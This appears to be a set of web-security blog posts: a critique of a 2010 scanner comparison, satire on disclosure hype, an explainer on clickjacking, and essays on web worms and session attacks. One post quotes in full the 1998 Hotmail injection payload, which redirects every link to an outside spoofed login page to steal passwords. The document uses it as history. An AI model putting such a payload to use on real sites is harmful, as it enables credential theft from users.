Observations on Larry Suto’s Paper about Web Application Security Scanners

Note: I’m the lead developer for the Web Application Scanning service at Qualys and I worked at NTO for about three years from July 2003 — both tools were included in this February 2010 report by Larry Suto. Never the less, I most humbly assure you that I am the world’s foremost authority on my opinion, however biased it may be.

The February 2010 report, Analyzing the Accuracy and Time Costs of Web
Application Security Scanners, once again generated heated discussion about web application security scanners. (A similar report was previously published in October 2007.) The new report addressed some criticisms of the 2007 version and included more scanners and more transparent targets. The 2010 version, along with some strong reactions to it, engender some additional questions on the topic of scanners in general:

How much should the ability of the user affect the accuracy of a scan?

Set aside basic requirements to know what a link is or whether a site requires credentials to be scanned in a useful manner. Should a scan result be significantly more accurate or comprehensive for a user who has several years of web security experience than for someone who just picked up a book in order to have spare paper for origami practice?

I’ll quickly concede the importance of in-depth manual security testing of web applications as well as the fact that it cannot be replaced by automated scanning. (That is, in-depth manual testing can’t be replaced; unsophisticated tests or inexperienced testers are another matter.) Tools that aid the manual process have an important place, but how much disparity should there really be between “out of the box” and “well-tuned” scans? The difference should be as little as possible, with clear exceptions for complicated sequences, hidden links, or complex authentication schemes. Tools that require too much time to configure, maintain, and interpret don’t scale well for efforts that require scanning to more than a handful of sites at a time. Tools whose accuracy correlates to the user’s web security knowledge scale at the rate of finding smart users, not at the rate of deploying software.

What’s a representative web application?

A default installation of osCommerce or Amazon? An old version of phpBB or the WoW forums? Web sites have wildly different coding styles, design patterns, underlying technologies, and levels of sophistication. A scanner that works well against a few dozen links might grind to a halt against a few thousand.

Accuracy against a few dozen hand-crafted links doesn’t necessarily scale against more complicated sites. Then there are web sites — in production and earning money no less — with bizarre and inefficient designs such as 60KB .NET VIEWSTATE fields or forms with seven dozen fields. A good test should include observations on a scanner’s performance at both ends of the spectrum.

Isn’t gaming a vendor-created web site redundant?

A post on the Accunetix blog accuses NTO of gaming the Accunetix test site based on a Referer field from web server log entries. First, there’s no indication that the particular scan cited was the one used in the comparison; the accusation has very flimsy support. Second, vendor-developed test sites are designed for the very purpose of showing off the web scanner. It’s a fair assumption that Accunetix created their test sites to highlight their scanner in the most positive manner possible, just as HP, IBM, Cenzic, and other web scanners would (or should) do for their own products. There’s nothing wrong with ensuring a scanner — the vendor’s or any other’s — performs most effectively against a web site offered for no other purpose than to show off the scanner’s capabilities.

This point really highlights one of the drawbacks of using vendor-oriented sites for comparison. Your web site probably doesn’t have the contrived HTML, forms, and vulnerabilities of a vendor-created intentionally-vulnerable site. Nor is it necessarily helpful that a scanner proves it can find vulnerabilities in a well-controlled scenario. Vendor sites help demonstrate the scanner, they provide a point of reference for discussing capabilities with potential customers, and they support marketing efforts. You probably care how the scanner fares against your site, not the vendor’s.

What about the time cost of scaling scans?

The report included a metric that attempted to demonstrate the investment of resources necessary to train a scanner. This is useful for users who need tools to aid in manual security testing or users who have only a few web sites to evaluate.

Yet what about environments where there are dozens, hundreds, or — yes, it’s possible — thousands of web sites to secure within an organization? The very requirement of training a scanner to deal with authentication or crawling works against running scans at a large scale. This is why point-and-shoot comparison should be a valid metric. (In opposition to at least one other opinion.)

Scaling scans don’t just require time to train a tool. It also requires hardware resources to manage configurations, run scans, and centralize reporting. This is a point where Software as a Service begins to seriously outpace other solutions.

Where’s the analysis of normalized data?

I mentioned previously that point-and-shoot should be one component of scanner comparison, but it shouldn’t be the only point — especially for tools intended to provide some degree of customization, whether it simply be authenticating to the web application or something more complex.

Data should be normalized not only within vulnerabilities (e.g. comparing reflected and persistent XSS separately, comparing error-based SQL injection separately from inference-based detections), but also within the type of scan. Results without authentication shouldn’t be compared to results with authentication. Other steps would be to compare the false positive/negative rates for tests scanners actual perform rather than checks a tool doesn’t perform. It’s important to note where a tools does or does not perform a check versus other scanners, but not performing a check has a different reflection on accuracy versus performing a check that still doesn’t identify a vulnerability.

What’s really going on here?

Designing a web application scanner is easy, implementing one is hard. Web security has complex problems, many of which have different levels of importance, relevance, and even nomenclature. The OWASP Top 10 project continues to refine its list by bringing more coherence to the difference between attacks, countermeasures, and vulnerabilities. The WASC-TC aims for a more comprehensive list defined by attacks and weaknesses. Contrasting the two approaches highlights different methodologies for testing web sites and evaluating their security.

So, if performing a comprehensive security review of a web site is already hard, then it’s likely to have a transitive effect on comparing scanners. Comparisons are useful and provide a service to potential customers, who want to find the best scanner for their environment, and useful to vendors, who want to create the best scanner for any environment. The report demonstrates areas not only where scanners need to improve, but where evaluation methodologies need to improve. Over time both of these aspects should evolve in a positive direction.

Earliest(-ish) hack against web-based e-mail

The book starts off with a discussion of cross-site scripting (XSS) attacks along with examples from 2009 that illustrate the simplicity of these attacks and the significant impact they can have. What’s astonishing is how little many of the attacks have changed. Consider the following example, over a decade old, of HTML injection before terms like XSS became so ubiquitous. The exploit appeared about two years before the blanket CERT advisory that called attention to insecurity of unchecked HTML.

On August 24, 1998 a Canadian web developer, Tom Cervenka, posted a message to the comp.lang.javascript newsgroup that claimed

We have just found a serious security hole in Microsoft’s Hotmail service (http://www.hotmail.com/) which allows malicious users to easily steal the passwords of Hotmail users. The exploit involves sending an e-mail message that contains embedded javascript code. When a Hotmail user views the message, the javascript code forces the user to re-login to Hotmail. In doing so, the victim’s username and password is sent to the malicious user by e-mail.

The discoverers, in apparent ignorance of the 1990’s labeling requirements for hacks to include foul language or numeric characters, simply dubbed it the “Hot”Mail Exploit. (They demonstrated further lack of familiarity with disclosure methodologies by omitting greetz, lacking typos and failing to remind the reader of near-omnipotent skills — surely an anomaly at the time. The hacker did not fail on all aspects. He satisfied the Axiom of Hacking Culture by choosing a name, Blue Adept, that referenced pop culture, in this case the title of a fantasy novel by Piers Anthony.)

The attack required two steps. First, they set up a page on Geocities (a hosting service for web pages distinguished by being free before free was co-opted by the Web 2.0 fad) that spoofed Hotmail’s login.

The attack wasn’t particularly sophisticated, but it didn’t need to be. The login form collected the victim’s login name and password then mailed them, along with the victim’s IP address, to the newly-created Geocities account.

The second step involved executing the actual exploit against Hotmail by sending an e-mail with HTML that contained a rather curious img tag:

<img src=”javascript:errurl=’http://www.because-we-can.com/users/anon/hotmail/getmsg.htm&#8217;;
nomenulinks=top.submenu.document.links.length;
for(i=0;i<nomenulinks-1;i++){top.submenu.document.links[i].target=’work’;
top.submenu.document.links[i].href=errurl;}noworklinks=top.work.document.links.length;
for(i=0;i<noworklinks-1;i++){top.work.document.links[i].target=’work’;
top.work.document.links[i].href=errurl;}”>

The JavaScript changed the browser’s DOM such that any click would take the victim to the spoofed login page at which point the authentication credentials would be coaxed from the unwitting visitor. The original payload didn’t bother to obfuscate the JavaScript inside the src attribute. Modern attacks have more sophisticated obfuscation techniques and use tags other than the img element. The problem of HTML injection, although well known for over 10 years, remains a significant attack against web applications.

Factor of Ultimate Doom

Vulnerability disclosure presents a complex challenge to the information security community. A reductionist explanation of disclosure arguments need only present two claims. One end of the spectrum goes, “Only the vendor need know so no one else knows the problem exists, which means no one can exploit it.” The information-wants-to-be-free diametric opposition simply states, “Tell everyone as soon as the vulnerability is discovered”.

The Factor of Ultimate Doom (FUD) is a step towards reconciling this spectrum into a laser-focused compromise of agreement. It establishes a metric for evaluating the absolute danger inherent to a vulnerability, thus providing the discoverer with guidance on how to reveal the vulnerability.

The Factor is calculated by simple addition across three axes: Resources Expected, Protocol Affected, and Overall Impact. Vulnerabilities that do not meet any of the Factor’s criteria may be classified under the Statistically Irrelevant Concern metric, which will be explored at a later date.

Resources Expected
(3) Exploit doesn’t require shellcode; merely a JavaScript alert() call
(2) Exploit shellcode requires fewer than 12 bytes. In other words, it must be more efficient than the export PS1=# hack (to which many operating systems, including OS X, remain vulnerable)
(1) Exploit shellcode requires a GROSS sled. (A GROSS sled uses opcode 144 on Intel x86 processors, whereas the more well-known NOP sled uses opcode 0x90.)

Protocol Affected
(3) The Common Porn Interchange Protocol (TCP/IP)
(2) Multiple online rhetorical opinion networks
(1) Social networks

Overall Impact
(3) Control every computer on the planet
(2) Destroy every computer on the planet
(1) Destroy another planet (obviously, the Earth’s internet would not be affected — making this a minor concern)

The resulting value is measured against an Audience Rating to determine how the vulnerability should be disclosed. This provides a methodology for verifying that a vulnerability was responsibly disclosed.

Audience Rating (by Factor of Ultimate Doom*)
(> 6) Can only be revealed at a security conference
(< 6) Cannot be revealed at a security conference
(< 0) Doesn’t have to be revealed; it’s just that dangerous

(*Due to undisclosed software patent litigation, values equal to 6 are ignored.)

Yawnjacking

So, I was asked to comment about clickjacking today. Technically, it isn’t a new vulnerability (IE6 fixed a variant in 2004, Firefox fixed a variant in September 2008), but a refinement of previous exploits and ennobled with a catchier name. It gained widespread coverage in October 2008 prior to the OWASP NYC conference when Jeremiah Grossman and Robert Hansen first said they would describe the vulnerability, then cancelled their talk for fear of unleashing Yet Another Exploit of Ultimate Doom.* The updated technique combines devious DOM manipulation with well-established attack patterns to make a respectable type of attack.

I still hope that this doesn’t make it into the OWASP Top 10. (I’ll explain why elsewhere.)
Anyway, in the interest of further polluting the internet with opinionated cruft, here’s more information about clickjacking:
Clickjacking tricks a user into clicking on an attacker-supplied page while the user only sees the appearance and effect of clicking on a plain link. The attacker identifies an area in the target HTML that should receive the click event. This HTML is placed within an IFRAME such that the X and Y offsets of the frame place the target area in the upper left-hand corner of the frame’s visible area. This target IFRAME is visually hidden from the user (though the element remains part of the DOM). Then, the IFRAME is set within a second page (the content of which doesn’t matter) beneath the mouse cursor and, very importantly, dynamically moves to always be underneath the mouse. Then, when the user clicks somewhere within the second page the click is actually sent to the target area even though it appears to the user that the mouse is only above some innocuous link.
Essentially, an attacker chooses some web page that, if the victim clicked some point (link, button, etc.) on that page, would produce some benefit to the attacker (e.g. generate click-fraud revenue, change a security setting, etc.). Next, the attacker takes the target page and places a second, innocuous page over it. The trick is to get the victim to make a mouse click on what appeared to be the innocuous page, but was actually an invisible element of the target page that has been automatically, but invisbly, placed beneath the cursor.
The attack relies on luring a user to a server under the attacker’s control or a site that has been compromised by the attacker. Web site owners who ensure their site is free of cross-site scripting or other vulnerabilities can prevent their sites from being used as a relay point for the attacker. Yet other successful attacks, such as phishing, also rely on luring users to a server under the attacker’s control. The relative success of phishing implies that just securing web applications at the server isn’t the only solution because users can be tricked into visiting malicious web sites.
The core of the attack occurs in the browser, which is where the real fix needs to appear. The problem is that browsers are intended to handle HTML from many sources and provide mechanisms to manipulate the location and visibility of elements within a web page. Consequently, any solution would have to block this attack while not inhibiting legitimate uses of this functionality.
*Yes, I made you scroll all the way down here to get the link. How evil is that?

The Internet is dead! Long live the Internet!

In 1998, L0pht claimed before Congress that in under 30 minutes their seven member group could make online porn and Trek fan sites unusable for several days. (That’s all that existed on the Internet in 1998.) In February 2002 an SNMP vulnerability threatened the very fabric of space and time (at least as it related to porn and Trek fan sites — if you still don’t believe me, consider that Google added Klingon language support the same month). More recently, a DNS vulnerability was (somewhat re-)discovered that could enable attackers to redirect traffic going to sites like google.com and wikipedia.com to sites that served porn, even though many people wouldn’t notice the difference. (Dan Kaminsky compiled a list of other apocalyptic vulnerabilities similar to the issues that plagued DNS.)

This year at the OWASP NYC AppSec 2008 Conference Jeremiah Grossman and Robert “RSnake” Hansen shared another vulnerability, clickjacking, in the Voldemort “He Who Must Not Be Named” style. In other words, yet another eschatonic vulnerability existed, but its details could not be shared. This disclosure method continued the trend from Black Hat 2008 prior to which the media and security discussion lists talked about the secretly-held, unsecretly-guessed DNS vulnerability information with the speculation usually retained for important things like when Gn’Fn’R would finally release Chinese Democracy. [If you don’t care about gory details of the disclosure drama and just want to skim the abattoir, then read this summary.]

Yet none of these doom-laden vulnerabilities have caused to Internet to go pfft like a certain parrot that need not be named.

Until now.
I’ve discovered a web-based vulnerability that can be trivially exploited called Cross-Hype Attack Forgery Exploit (CHAFE). It affects all web browsers and can’t be patched (nor will you be protected by FireFox’s NoScript or using lynx). In fact, if you’re reading this entry then I guarantee you can be vulnerable to it. Public release of the details would be self-defeating, but I’m willing to sell the details to the highest bidder — as well as anyone else who wants to pay for the information. To ensure the validity of this vulnerability, consider that it has both “cross” and “forgery” in the name. So, it clearly has a working exploit associated with it. No peer review is necessary to establish the vulnerability’s credibility. To build further confidence, I’ll hint that the vulnerability builds on prior research, but who really cares about dusty problems from 1991 when you can have a working exploit in 2008?
Since I haven’t gotten around to creating PayPal account yet (although a reminder to update my account information just arrived in my InBox a few moments ago), send an e-mail to chafe@hackculture.com if you’re interested in the details and you have some money from which you’d like to be departed.

Good morning, Worm, Your Honor

[This was originally posted August 2003 on the now-defunct vulns.com site before the Samy worm and sophisticated XSS attacks appeared. In the five years since this was first posted, web applications still struggle with fixing XSS and SQL injection vulnerabilities. In fact, it’s still possible to discover web sites that put raw SQL statements in URL parameters.]

With the advent of the Windows RPC-based worm, security pros once again loudly lament the lack of patched servers, security-aware power users once again loudly blast Microsoft for (insert favorite negative adverb here) written code, and company parking lots at midnight still have a few sticker-laden cars of sysadmins fixing the problem. Of course, there are a few differences such as Joe and Jane’s home computers have been caught red-handed showing vulnerable ports (unlike SQL Slammer or the IIS worm of the month which targeted servers not usually found in home networks), but the usual suspects still linger.

In fact, we could diverge onto many different topics when talking about worms. For starters, what’s the point of arguing against full disclosure when worms arise weeks (SQL Slammer, our RPC friend) or months (Nimda and Code Red) AFTER the patch has been released? Obviously, that sidesteps many arguments against full-disclosure but it’s food for thought. What about the plethora of port scanners and one-time “freebie scanners” that security companies pump out to capitalize the hysteria? Yes, there are administrators who don’t know what’s on their network, but I’m willing to bet there’s a larger number of administrators trying to figure out how to test, update, and manage a patch for 100, 1,000, or 5,000+ systems. You can’t release a patch and expect it to be applied to 1,000 servers within 24 hours. The tools to manage the patch process are too few, while the number of scanners is overwhelming. That’s not to say that security scanning isn’t necessary — it’s just a small part of the process. Administrators need help with patch testing, installation, and management.

Okay, so I’ve diverged onto a few topics already; but the one I wanted to highlight is what happens when a worm exploits a Web Application vulnerability? Cgisecurity.com has a nice essay on one concept of such a worm. How easily could one spread? It may not be hard with a SQL injection and xp_cmdshell(). Who will be the scapegoat? It probably won’t involve cute references to “Billy Gates.” You can’t blame administrators for not being able to download a universal patch (although some ISAPI filters or Apache modules could prevent a lot of attacks). In the end, you have to return to the programmers. They must be aware that Web applications have vulnerabilities that don’t fall into the bloated category of “Buffer Overflow.”

Buffer overflows are sexy to report when they involve popular software. Plus, it’s nice to see a group doing security research for fun. Yet when a worm finally targets Web applications, nmap and vulnerability scanners in the nature of nikto or nessus probably won’t cut it when administrators want to check if their Web applications are vulnerable. Instead, they’ll want web application-aware tools to check live systems and code review tools to audit the source code. The proliferation of buffer overflows has led to some useful code review tools and compilers that can spot a minority of potential overflow vulnerabilities. The OWASP is a good start. Hopefully, the tools to audit web applications and review source code will reach a point so that the next worm won’t spread through e-commerce applications. Everyone talks about how much worse a buffer overflow-based worm could have been, but a worm that gathers passwords and collects credit card numbers from an e-commerce application has more implications for the average Internet user than a worm erasing a company’s hard drives.

So…so you think you can tell

[This was originally posted July 2003 on the now-defunct vulns.com site. Even several years later no web application scanner can automatically identify such vulnerabilities in a reliable, accurate manner — many vulnerabilities still require human analysis.]

Sit and listen to Pink Floyd’s album, Wish You Were Here. “Can you tell a green field from a cold steel rail?” Yes. Could you tell a buffer overflow from a valid username in a Web application? Yes again. What about SQL injection, cross-site scripting, directory traversal attacks, or appending “.bak” to every file? Once again, Yes. In fact, many of these attacks have common signatures that could be thrown into Snort or passed through a simple grep command when examining application log files. These are the vulnerabilities that are reported most often on sites like www.cgisecurity.com or www.securityfocus.com. And they pop up for good reason: they’re dangerous and quickly cripple an e-commerce application.

On the other hand, a different category of attacks has not yet crept far enough into the awareness of security administrators and application programmers: session attacks. There are several reasons for this relative obscurity. No automated tool does a proper job of identifying session vulnerabilities without customization to the application. There are no defined signatures to try, as opposed to the simpler single quote insertion for a SQL injection test. Most importantly, session state vulnerabilities vary significantly between applications.
The consequence of session attacks is no less severe than a good SQL injection that hits xp_cmdshell. Consider last May’s Passport advisory in which an attacker could harvest passwords with tools no more sophisticated than a Web browser. The attack relies on selecting proper values for the “em” (victim’s e-mail) and “prefem” (attacker’s e-mail) parameters to the emailpwdreset.srf file. It should really be stressed that nowhere in this attack were invalid characters sent to the server. Both parameters were attacked, but the payload contained valid e-mail addresses – not e-mail addresses with single quotes, long strings, Unicode encoded characters, or other nefarious items.

The attack succeeded for two major reasons. The e-mail addresses are exposed to the client, rather than tracked on the server in a session object. The four steps ostensibly required for a user to complete the password reminder process did not have to be performed in sequential order, which demonstrates lack of a strong state mechanism.

It seems that most buffer overflow-style attacks against operating systems or Internet servers such as IIS or Apache have led to site defacements or denial of service attacks. Yet as e-commerce has grown with Web applications, so have the vulnerabilities moved on from buffer overflows. Plus, the attacks against Web applications no longer lead to site defacement, but to identity or financial theft (credit cards). Thus, vulnerabilities that used to affect only the server’s owners (and perhaps annoy users who can’t access the service for a period) now include Web application vulnerabilities that quite directly affect users.
As administrators and programmers, we need to be aware of all the vulnerabilities that crop up in Web applications – not just the easy (yet still important!) ones that currently populate the Web vulnerability encyclopedia.